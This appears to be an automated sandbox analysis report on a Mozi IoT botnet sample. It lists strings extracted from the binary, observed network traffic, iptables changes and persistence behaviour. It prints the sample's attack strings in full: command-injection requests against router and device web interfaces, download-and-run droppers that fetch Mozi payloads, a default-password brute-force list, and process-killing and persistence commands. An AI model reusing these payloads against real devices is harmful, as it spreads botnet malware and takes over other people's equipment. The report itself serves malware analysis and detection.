Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Apr 2021 19:13:31 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.m
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.m;
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.m;$
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/bin.sh
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: rIbyGX66Op String found in binary or memory: http://127.0.0.1
Source: rIbyGX66Op String found in binary or memory: http://127.0.0.1sendcmd
Source: rIbyGX66Op String found in binary or memory: http://HTTP/1.1
Source: rIbyGX66Op String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: rIbyGX66Op String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: rIbyGX66Op String found in binary or memory: http://purenetworks.com/HNAP1/
Source: rIbyGX66Op String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: rIbyGX66Op String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: rIbyGX66Op String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk
Source: /tmp/rIbyGX66Op (PID: 4578) HTML file containing JavaScript created: /usr/networks

System Summary:

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: POST /cdn-cgi/
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample Potential command found: mount -o remount,rw /overlay /
Source: Initial sample Potential command found: mv -f %s %s
Source: Initial sample Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: killall -9 %s
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: POST /%s HTTP/1.1
Source: Initial sample Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: rIbyGX66Op, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4616) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4650) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4653) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4690) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4716) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
Source: /bin/sh (PID: 4736) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
Source: /bin/sh (PID: 4739) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
Source: /bin/sh (PID: 4748) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
Source: /bin/sh (PID: 4793) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4796) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4805) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4829) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4878) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4906) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4926) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4931) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4947) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4974) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 5000) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 5021) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 5025) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 5034) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 5057) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 5087) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 5117) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5120) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5127) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5152) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5182) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT
Source: /bin/sh (PID: 5210) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
Source: /bin/sh (PID: 5231) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
Source: /bin/sh (PID: 5234) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/rIbyGX66Op (PID: 4578) File: /proc/4578/mounts
Sample tries to persist itself using /etc/profile
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/cedilla-portuguese.sh
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/apps-bin-path.sh
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/Z97-byobu.sh
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/bash_completion.sh
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/vte-2.91.sh
Sample tries to persist itself using System V runlevels
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/rcS.d/S95baby.sh
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/rc.local
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 4582) Killall command executed: killall -9 telnetd utelnetd scfgmgr
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Source: /tmp/rIbyGX66Op (PID: 4580) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
Source: /tmp/rIbyGX66Op (PID: 4614) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 4648) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 4651) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 4682) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 4708) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 54753 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 4732) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 4737) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 4741) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 4791) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4794) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4799) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4821) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4845) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
Source: /tmp/rIbyGX66Op (PID: 4857) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
Source: /tmp/rIbyGX66Op (PID: 4868) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4897) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4921) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4928) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4937) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4966) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 4991) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 5017) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 5023) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 5028) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 5049) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 5077) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
Source: /tmp/rIbyGX66Op (PID: 5115) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 5118) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 5122) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 5142) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 5173) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8000 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 5200) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 5228) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT"
Source: /tmp/rIbyGX66Op (PID: 5232) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT"
Executes the "iptables" command used for managing IP filtering and manipulation
